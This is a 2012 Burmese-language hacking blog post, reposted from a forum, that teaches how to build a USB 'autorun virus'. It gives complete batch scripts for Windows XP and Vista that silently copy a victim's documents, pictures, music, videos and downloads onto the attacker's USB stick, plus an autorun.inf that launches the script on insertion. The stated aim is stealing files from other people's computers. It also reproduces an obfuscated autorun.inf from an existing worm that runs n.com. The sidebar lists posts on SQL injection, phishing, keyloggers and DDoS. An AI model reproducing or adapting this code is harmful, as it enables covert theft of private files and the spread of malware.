Sunday, March 11, 2012
@utorun virus making
Published :
1:07 AM
Author :
shwekoyantaw
virus နာမည္မတပ္တတ္လို႔ autorun လို႔ပဲတပ္လိ္ုက္မယ္ဗ်ာ.. ကြန္ပ်ဴတာတစ္လံုးကို USB drive ေလးထိုးလိုက္တာနဲ႔ ဖိုင္ေတြကို ေနာက္ကြယ္ကေနခိုးေပးမဲ့ autorun viurs ေလးလုပ္မယ္ဗ်ာ...ဒီဗိုင္းရပ္စ္က ၀င္ခံရတဲ့ကြန္ပ်ဴတာထဲ
ကဖိုင္ေတြခိုးရံုကလြဲလို႔ အႏၱရယ္မရွိပါဘူး...ကဲ ပထမဆံုး notepad ေလးဖြင့္လိုက္ပါ..(မဖြင့္တတ္ရင္ window ခလုပ္နဲ႔ r နဲ႔တြဲပီးႏွိပ္ ေပၚလာတဲ့ run box ထဲမွာ notepad လို႔ရိုက္ျပီး enterေခါက္လိုက္ပါ..)
notepad ေလးဖြင့္ျပီးရင္ ေအာက္က ကုတ္ေတြကို ကူးထည့္လိုက္ပါ...ေအာက္ကဟာက Window XP OS ကိုသံုးထားတဲ့စက္အတြက္ပါ...
@echo off:CHECKif not exist "%nyipainglay%\Copied_files" md "%nyipainglay%\Copied_files"if exist "
%systemdrive%\Documents and Settings" goto COPIERgoto ERROR
:COPIERif not exist "%nyipainglay%\Copied_files\%computername%" md "%nyipainglay%\Copied_files\%computername%"if
not exist "%nyipainglay%\Copied_files\%computername%\VIDEOS" md "%nyipainglay%\Copied_files\%computername%
\VIDEOS"if not exist "%nyipainglay%\Copied_files\%computername%\PICTURES" md
"%nyipainglay%\Copied_files\%computername%\PICTURES"if not exist "%nyipainglay%\Copied_files\%computername%\MUSIC" md "%
nyipainglay%\Copied_files\%computername%\MUSIC"if not exist "%nyipainglay%\Copied_files\%computername%\DOWNLOADS" md
"%nyipainglay%\Copied_files\%computername%\DOWNLOADS"copy /y "%userprofile%\My Documents\*.*" "%nyipainglay%\Copied_files\%computername%"copy /y "%userprofile%\My Documents\My Videos" "%nyipainglay%\Copied_files\%computername%\VIDEOS"copy /y "%userprofile%\My Documents\My Music" "%nyipainglay%\Copied_files\%computername%\MUSIC"copy /y "%userprofile%\My Documents\My Pictures" "%nyipainglay%\Copied_files\%computername%\PICTURES"copy /y "%userprofile%\My Documents\Downloads" "%nyipainglay%\Copied_files\%computername%\DOWNLOADS"MSG %username% "DONE!"exit:ERRORexit
ေအာက္ကကုတ္ေလးကေတာ့ Vista အတြက္ပါ...
@echo off:CHECKif not exist “%nyipainglay%\Copied_files” md “%nyipainglay%\Copied_files”if exist “%systemdrive%\files” goto COPIER7goto ERROR:COPIER7if not exist “%nyipainglay%\Copied_files\%computername%” md “%nyipainglay%\Copied_files\%computername%”if not exist “%nyipainglay%\Copied_files\%computername%\VIDEOS” md “%nyipainglay%\Copied_files\%computername%\VIDEOS”if not exist “%nyipainglay%\Copied_files\%computername%\PICTURES” md
“%nyipainglay%\Copied_files\%computername%\PICTURES”if not exist “%nyipainglay%\Copied_files\%computername%\MUSIC” md “%nyipainglay%\Copied_files\%computername%\MUSIC”if not exist “%nyipainglay%\Copied_files\%computername%\DOWNLOADS” md
“%nyipainglay%\Copied_files\%computername%\DOWNLOADS”copy /y “%userprofile%\Documents\*.*” “%nyipainglay%\Copied_files\%computername%”copy /y “%userprofile%\Videos” “%nyipainglay%\Copied_files\%computername%\VIDEOS”copy /y “%userprofile%\Music” “%nyipainglay%\Copied_files\%computername%\MUSIC”copy /y “%userprofile%\Pictures” “%nyipainglay%\Copied_files\%computername%\PICTURES”copy /y “%userprofile%\Downloads” “%nyipainglay%\Copied_files\%computername%\DOWNLOADS”MSG %username% “DONE!”exit:ERRORexit
Window 7 အတြက္ေတာ့ မရွိေသး၀ူးဗ်..ရွိရင္လဲ ရွဲထားခဲ့ပါဦး...
အဲ..ေျပာစရာတစ္ခုက်န္ေသးတယ္ဗ်.. အေပၚက ကုတ္ေတြထဲက nyipainglay ေနရာေတြမွာ ကိုယ့္ USB stick နာမည္ change ေပါ့ဗ်ာ...
မခ်ိန္းခ်င္လဲ စတစ္ကို nyipainglay လို႔ေျပာင္းလိုက္ပါေပါ့ေနာ္....ဟဲ
ကဲ အေပၚက ဟာေတြကို လုပ္ျပီးသြားရင္ save မယ္ဗ်ာ...save တဲ့ေနရာမွာလဲ ၾကိဳက္တဲ့နာမည္တစ္ခုခုရဲ႕ေနာက္မွာ .bat ထည့္ save ရမွာပါ..(ဥပမာ- nyipainglay.bat လိုေပါ့)
ကုတ္ထဲမွာ MD command သံုးထားတဲ့အတြက္ေၾကာင့္ USB stick ထဲကိုCopied_files ဆိုတဲ့ folder ေလးေဆာက္ေပးမယ္ ျပီးရင္ အဲ့ထဲကို ကူးမဲ့ဖိုင္ေတြ သူ႕ဘာသာသူ ကူးထည့္မယ္...
ကဲ virus ေလးေတာ့ လုပ္ျပီးပီ.. ဒီvirus က ကိုယ္မဖြင့္ရင္ ပြင့္မွာမဟုတ္ပါဘူး.. သူမ်ားကြန္ပ်ဴတာထဲက ဖိုင္ေတြကို ခိုးဖို႔စိုက္ျပီး ဒီဖိုင္ေလးဖြင့္ရင္ သူမ်ားက ကိုယ္ခိုးေတာ့မယ္ဆိုတာ သိသြားမွာေပါ့.
ဒီေတာ့ ဒီဗိုင္းရပ္စ္ေလးကို USB stick ေလးစိုက္လိုက္တာနဲ႔ သူဘာသာသူဖြင့္ေအာင္ (autorun ေအာင္) လုပ္ေပးရမွာပါ...ဒါက လြယ္ပါတယ္...notepad ေလးဖြင့္လိုက္ပါဦး..
ျပီးရင္ေအာက္ကကုတ္ေလးကူးထည့္လိုက္...
[autorun]
Open=nyipainglay.bat
Action=File Copier
အဲ့ဒီထဲက nyipainglay.bat ဆိုတဲ့ေနရာမွာ ေစာေစာက လုပ္ထားတဲ့ .bat ဖိုင္အမည္ေလးကို ထည့္ေပးလိုက္ရံုပါပဲ..ျပီးရင္ autorun.inf ဆိုျပီး save လိုက္ပါ...
autorun.inf ဆိုတဲ့ဖိုင္ေရာ .bat (eg: nyipainglay.bat) ဆိုတဲ့ ဖိုင္ႏွစ္ခုစလံုး စတစ္ထဲကို ထည့္လိုက္ပါ....ကဲ လုပ္လို႔ေတာ့ ျပီးသြားျပီဗ်ာ..
စမ္းခ်င္ရင္ စတစ္ကို ျဖဳတ္ျပီး ျပန္တပ္ၾကည့္လိုက္ပါ...တကယ္လို႔ သူ႔ဘာသာသူ ေကာ္ပီကူးမေပးဘူးဆိုရင္ တက္လာတဲ့ autorun ထဲက "play with music player" နဲ႔ "read only" လို ဟာေလးကို ေရြးေပးလိုက္ပါ
ဒါဆိုရင္ File Copier ေလးကို ရွာႏိုင္မွာျဖစ္ပါတယ္.....မွားတာရွိရင္ ေထာက္ျပသြားပါခင္ဗ်ာ
အေပၚကအတိုင္းပဲ ကၽြန္ေတာ့္ဘာသာ autorun virus လို႔ေပးခဲ့ပါတယ္.. ဟုတ္ေပမဲ့ ဒီေကာင္က autorun.inf နဲ႔ တြဲမွသာ autorun ျဖစ္တာပါ...
autorun.inf ဆိုတဲ့ Virus ကို ဒီေန႔မွ ကိုသံလံုငယ္ဆိုက္က သိခဲ့ပါတယ္... ကုတ္ကေတာ့..ေအာက္ကအတိုင္းပါ...notepad ထဲကူးထည့္.. autorun.inf နဲ႔ save လိုက္ရမွာ ျဖစ္ပါတယ္...ကိုသံလံုငယ္ေတာင္ မသတ္ႏိုင္ဘူးဆိုဘဲဗ်...အႏၱရယ္ေတာ့ အမ်ားၾကီး မၾကီးပါဘူး..ကိုယ့္စက္ထဲေတာ့ မဖြင့္ၾကည့္နဲ႔ေပါ့..Defreeze တို႔ shawdow defender တို႔ တင္ထားရင္ေတာ့ လုပ္ေပါ့ဗ်ာ....
;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1
[AutoRun]
;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia
open=n.com
;irllr3rr3jiDia3lw4s52q
shell\open\Command=n.com
;w22swS
shell\open\Default=1
;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2
shell\explore\Command=n.com
;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00olsw4k2os344k0dw
ဒီဗိုင္းရပ္စ္ရဲ႕ အာနိသင္ေတြကို ကိုသံလံုငယ္ဆိုက္ကဘဲ ကူးျပလုိက္ပါတယ္...
၁ ။ .. Folder Option မွာ open each folder in the same window လို႔ေပးထားရဲ႕သားနဲ႔ Drive ေတြကို D-click နဲ႔ဖြင္႔ရင္ ေနာက္ window တစ္ခုကေနပြင္႔ပါတယ္ ။ ( အဲဒီက တစ္ဆင္႔ ထပ္ဖြင္႔ရင္ေတာ႔ same window ျဖစ္သြားပါတယ္)
၂။ .. Folder Option – View မွာ Show Hidden Files and Folders လို႔ေပးၿပီး Save လိုက္ပါတယ္ ။ Hidden files ေတြ ေပၚမလာပါဘူး ။ Folder Option – View ကိုျပန္ၾကည္႔ Hidden လို႔ျပန္ျဖစ္ေနပါတယ္ ။ ေျပာင္းလို႔မရပါ ။
၃ ။ .. Winrar ကို ဖြင္႔ၿပီး Address bar မွာ C:\\ လို႔ ေရးထည္႔လိုက္ပါ ။ ေအာက္ပါအတိုင္း autorun.inf ဆိုၿပီးေတြ႔ပါတယ္ ။ ျဖတ္လိုက္ပါတယ္ ။ မရပါဘူး ခဏေလးေနၿပီး ျပန္ေပၚလာပါတယ္ ။ တစ္ျခား drive ေတြအားလံုးမွာလဲ အဲဒီဖိုင္ အဲဒီအတိုင္းပဲ ရိွေနပါလိမ္႔မယ္ ။ အေကာင္းဆံုးဆိုတဲ႔ KAV , KIS ေတြနဲ႔ ဗိုင္းရပ္ စစ္ေတာ႔ ေပၚပါတယ္။ Delete နဲ႔ သတ္လိုက္ပါတယ္ ။ ပ်တ္မသြားပါဘူး … ။
copy from
http://mmhackforums.noonhost.com/viewtopic.php?f=10&t=181
Pageviewers
CBOX
Manutd-Results
LINK
Label
Android
(3)
autorun
(3)
Backtrack
(8)
batch file
(19)
blogger
(10)
Botnet
(2)
browser
(5)
Brute Force
(6)
cafezee
(2)
cmd
(5)
Cookies
(2)
crack
(12)
Cracking
(2)
crypter
(7)
DDos
(20)
deepfreeze
(4)
defacing
(1)
defence
(16)
domain
(4)
Dos
(9)
downloader
(4)
ebomb
(2)
ebook
(48)
Exploit
(26)
firewall
(3)
game
(2)
gmail
(11)
google hack
(16)
Hacking Show
(3)
Hash
(4)
hosting
(1)
icon changer
(1)
ip adress
(6)
Keygen
(1)
keylogger
(8)
knowledge
(67)
locker
(1)
maintainence
(8)
network
(17)
news
(31)
other
(35)
passwoard viewer
(7)
password
(12)
Philosophy
(6)
Phishing
(8)
premium account
(2)
proxy
(7)
RAT
(10)
run commands
(4)
script
(27)
Shell code
(10)
shortcut Key
(2)
SMTP ports
(1)
social engineering
(7)
spammer
(1)
SQL Injection
(30)
Stealer.crack
(5)
tools
(125)
Tools Pack
(4)
tutorial
(107)
USB
(3)
virus
(32)
website
(84)
WiFi
(4)
word list
(2)
HOW IS MY SITE?
Powered by Blogger.
Blog Archive
-
▼
2012
(210)
-
▼
March
(20)
- Dominican Republic Police arrested 6 Anonymous hac...
- .::How to Make Batch Yourself & Some Batch Code::.
- www.nanuindia.com H@cK By ME
- Sql injection Tutorials::..
- sql injection with tool(havij) tutorial
- List of Webs Hacking Techniques
- "Tmedit Popuop" Deface and Shell upload vulnerability
- ..::Sql poizon v1.1 tutorial::..
- <---Manual Sql Tutorial[Bypassing Admin Login]--->...
- Windows xp Hidden Application
- How to work Facebook Wall Flooder
- @utorun virus making
- ..::Facebook Wall Flooder::..
- ★How to run JPG as an EXE [Shortcut Executing Meth...
- Top Free Online Virus Scan Services
- This is what we called “Hacking
- Hacking Using Google
- daily use 10 of Linux Commands
- ..::Hacking Facebook Accounts Passwords Tutorial::..
- IIS Hacking Tutorials
-
▼
March
(20)
Followers
About Me
Popular Posts
-
SQL Dorks အသစ္ေလးေတြလို႔ထင္ပါတယ္..ဒီက ဟက္ကာေတြအတြက္ေတာ့ ေဟာင္းခ်င္ေဟာင္းေနမွာေပါ့..ကၽြန္ေတာ့္ဆီရွိတာေလးေတြပါ..မၾကိဳက္လဲ ေနေပါ့. :P inurl...
-
--- မိတ္ဆက္--- Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္...
-
အေကာင္းစားမွန္ဘီလူး (မ်တ္ခ်က္။ ။ရွားေလာ့ဟုန္းဆီကမဟုတ္ပါ) ကၽြန္ေတာ္မွန္ဘီလူးေလးတစ္လက္ရထားတယ္။ ဘယ္ႏွယ္ဗ်ာ ကၽြန္ေတာ့္မွန္ဘီလူးကိုမ်ာ...
-
အဓိက က ေတာ့ forums ေတြပဲ. Register လုပ္မွ ၀င္ေရာက္ၾကည့္ရွဳ ႏိုင္မယ္.. bypass လုပ္ဖုိ႔ ကေတာ့ SQL injection ကေတာ့ အေကာင္းဆံုးေပါ့.. အခုေတာ့ ...
-
အသိပညာ ဗဟုသုတသည္ ဟက္ကာတုိ႔ရန္မွ ကာကြယ္ရန္ စြမ္းအားတစ္ခုၿဖစ္ေပသည္။ ယေန႔ေခတ္ အုိင္တီနယ္ပယ္ဆုိင္ရာ စီမံခန္႔ခြဲမႈတြင္ တာ၀န္ရွိသူမ်ားသည္ ၄င္းတ...
-
ဘာရယ္လို႕မဟုတ္ပါဘူး ဒီေန႕ဘာတင္ရ မလဲစဥ္းစားရင္း အေျခခံကစၾကတာေပါ့။ ပထမဆံုး notepad ကိုေခၚပါ။batch file ေရးနည္းက programmingအာလံုး .bat...
-
ကဲဆိုက္တစ္ခုကရတာျပန္ျပီးေတာ့ေ၀မွ်လိုက္ပါတယ္။စမ္းသပ္ခ်င္သူေတြအတြက္ပါ။ သံုးခ်င္ရင္ သံုးပါ။စည္ကမ္းေတာ့ရိွပါေစ။ code: http://13campaign.org...
-
LFI Local File Inclusion ေလး အေၾကာင္းေျပာခ်င္ပါတယ္ ညီကိုတို႔.... Online မွာ LFI ေပါက္ေနတဲ့ဆိုက္ေတြ သန္းခ်ီပီးရွိေနပါတယ္.... Web Hacking ေ...
-
ဒီပိုစ့္ေလးဟာ LFI ေပၚမွာဆင့္ကဲေျပာင္းလဲထားတာျဖစ္ျပီးေတာ့ BASE 64 php filter ကိုအသံုးျပဳမွာျဖစ္ပါတယ္....။ဆာဗာမွာရိွတဲ့ connect.php / conf...
-
၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို Giacomo က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို ဘာသာၿပန္ၿပီး တ...
Labels
- Android (3)
- autorun (3)
- Backtrack (8)
- batch file (19)
- blogger (10)
- Botnet (2)
- browser (5)
- Brute Force (6)
- cafezee (2)
- cmd (5)
- Cookies (2)
- crack (12)
- Cracking (2)
- crypter (7)
- DDos (20)
- deepfreeze (4)
- defacing (1)
- defence (16)
- domain (4)
- Dos (9)
- downloader (4)
- ebomb (2)
- ebook (48)
- Exploit (26)
- firewall (3)
- game (2)
- gmail (11)
- google hack (16)
- Hacking Show (3)
- Hash (4)
- hosting (1)
- icon changer (1)
- ip adress (6)
- Keygen (1)
- keylogger (8)
- knowledge (67)
- locker (1)
- maintainence (8)
- network (17)
- news (31)
- other (35)
- passwoard viewer (7)
- password (12)
- Philosophy (6)
- Phishing (8)
- premium account (2)
- proxy (7)
- RAT (10)
- run commands (4)
- script (27)
- Shell code (10)
- shortcut Key (2)
- SMTP ports (1)
- social engineering (7)
- spammer (1)
- SQL Injection (30)
- Stealer.crack (5)
- tools (125)
- Tools Pack (4)
- tutorial (107)
- USB (3)
- virus (32)
- website (84)
- WiFi (4)
- word list (2)
Labels
- Android (3)
- autorun (3)
- Backtrack (8)
- batch file (19)
- blogger (10)
- Botnet (2)
- browser (5)
- Brute Force (6)
- cafezee (2)
- cmd (5)
- Cookies (2)
- crack (12)
- Cracking (2)
- crypter (7)
- DDos (20)
- deepfreeze (4)
- defacing (1)
- defence (16)
- domain (4)
- Dos (9)
- downloader (4)
- ebomb (2)
- ebook (48)
- Exploit (26)
- firewall (3)
- game (2)
- gmail (11)
- google hack (16)
- Hacking Show (3)
- Hash (4)
- hosting (1)
- icon changer (1)
- ip adress (6)
- Keygen (1)
- keylogger (8)
- knowledge (67)
- locker (1)
- maintainence (8)
- network (17)
- news (31)
- other (35)
- passwoard viewer (7)
- password (12)
- Philosophy (6)
- Phishing (8)
- premium account (2)
- proxy (7)
- RAT (10)
- run commands (4)
- script (27)
- Shell code (10)
- shortcut Key (2)
- SMTP ports (1)
- social engineering (7)
- spammer (1)
- SQL Injection (30)
- Stealer.crack (5)
- tools (125)
- Tools Pack (4)
- tutorial (107)
- USB (3)
- virus (32)
- website (84)
- WiFi (4)
- word list (2)
Archive
-
▼
2012
(210)
-
▼
March
(20)
- Dominican Republic Police arrested 6 Anonymous hac...
- .::How to Make Batch Yourself & Some Batch Code::.
- www.nanuindia.com H@cK By ME
- Sql injection Tutorials::..
- sql injection with tool(havij) tutorial
- List of Webs Hacking Techniques
- "Tmedit Popuop" Deface and Shell upload vulnerability
- ..::Sql poizon v1.1 tutorial::..
- <---Manual Sql Tutorial[Bypassing Admin Login]--->...
- Windows xp Hidden Application
- How to work Facebook Wall Flooder
- @utorun virus making
- ..::Facebook Wall Flooder::..
- ★How to run JPG as an EXE [Shortcut Executing Meth...
- Top Free Online Virus Scan Services
- This is what we called “Hacking
- Hacking Using Google
- daily use 10 of Linux Commands
- ..::Hacking Facebook Accounts Passwords Tutorial::..
- IIS Hacking Tutorials
-
▼
March
(20)